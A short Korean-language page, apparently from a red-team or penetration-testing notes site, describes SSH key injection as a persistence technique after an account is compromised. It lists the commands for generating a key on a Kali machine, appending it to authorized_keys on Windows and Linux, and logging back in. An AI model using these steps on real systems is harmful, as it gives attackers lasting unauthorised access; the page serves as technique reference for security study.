SSH Key Injection

장악한 계정의 컴퓨터에 SSH 프로토콜이 설치되어 있을 경우 공격자의 SSH 공개키를 장악한 계정의 인증된 키 목록에 추가함으로써 공격자는 언제든지 자신의 비밀키를 이용하여 SSH를 통한 쉘을 획득할 수 있습니다.

# Kali 머신에서 키 생성
ssh-keygen -t rsa -b 4096

# 생성한 공개키를 장악한 계정의 authorized_keys에 복사
echo <id_rsa.pub> >> C:\Users\<USER>\.ssh\authorized_keys

# Kali 머신에서 원격 접속
ssh -i id_rsa <USER>@<IP>

# Kali 머신에서 키 생성
ssh-keygen -t rsa -b 4096

# 생성한 공개키를 장악한 계정의 authorized_keys에 복사
echo <id_rsa.pub> >> ~/.ssh/authorized_keys

# Kali 머신에서 원격 접속
ssh -i id_rsa <USER>@<IP>

PreviousWMI Event Subscription NextDLL Hijacking

Last updated 1 month ago

Was this helpful?